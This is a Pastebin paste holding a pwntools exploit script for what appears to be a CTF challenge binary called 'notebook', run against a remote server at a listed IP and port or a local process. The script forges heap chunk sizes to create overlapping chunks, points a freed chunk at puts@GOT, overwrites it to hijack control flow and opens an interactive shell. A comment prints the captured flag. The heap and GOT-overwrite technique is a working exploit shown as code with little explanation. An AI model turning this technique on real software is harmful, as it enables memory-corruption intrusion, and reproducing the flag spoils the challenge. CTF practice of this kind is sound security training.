Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import sys
- import time
- from pwn import *
- libc=ELF("./libc-2.27.so")
- if len(sys.argv) >1:
- flag=1
- r = remote("125.235.240.172", 1337)
- else:
- flag=0
- r = process("./notebook",aslr=True)
- def back():
- r.sendafter('Delete\n','1')
- def next():
- r.sendafter('Delete\n','2')
- def add(content):
- r.sendafter('Delete\n','3')
- sleep(0.25)
- r.send(content)
- def addbig(content):
- r.sendafter('Delete\n','4')
- sleep(0.25)
- r.send(content)
- def edit(content):
- r.sendafter('Delete\n','5')
- sleep(0.25)
- r.send(content)
- def delete():
- r.sendafter('Delete\n','6')
- def main():
- #malloc 5 chunk
- log.info("A=Malloc 1000")
- add("A")
- log.info("B=Malloc 1000")
- add("B")
- log.info("C=Malloc 1000")
- add("C")
- log.info("D=Malloc 1000")
- add("D")
- log.info("E=Malloc 1000")
- add("E")
- log.info("Move currentNode to D")
- back() #Move currentNode to D
- log.info("Delete D")
- log.info("To make sure the chunk 4 not concat with top chunk")
- delete() #delete
- log.info("Move currentNode to B")
- back() #Move currentNode to B
- log.info("Move currentNode to A")
- back() #Move currentNode to A
- log.info("Set size of B to (sizeB+sizeC+PrevInUse+8)")
- log.info("Make sure fake free chunk has size > size the next malloc")
- edit("A"*(992-8)+p64(2017))
- log.info("Move currentNode to B")
- next()
- log.info("Delete B")
- delete()
- log.info("Move currentNode to C")
- next()
- log.info("Move currentNode to E")
- next()
- log.info("Next malloc will has B pointer so we can overflow the C")
- addbig("F"*(992-8)+p64(0x03f1)+p64(0x0601020 )+p64(0x601010)+"OVERFLOWED")
- log.success("C OVERFLOWED")
- next()
- back()
- back()
- log.info("Now C->fd will point to puts@GOT.PLT")
- next()
- log.info("Write &canyouruneme to puts@GOT.PLT")
- raw_input("Trigger?")
- edit(p64(0x0400850))
- r.recv()
- log.success("Triggered.")
- r.interactive()
- #cat flag
- #matesctf{i6lULX6Z86JHr5UI4MSP}
- if __name__ == "__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement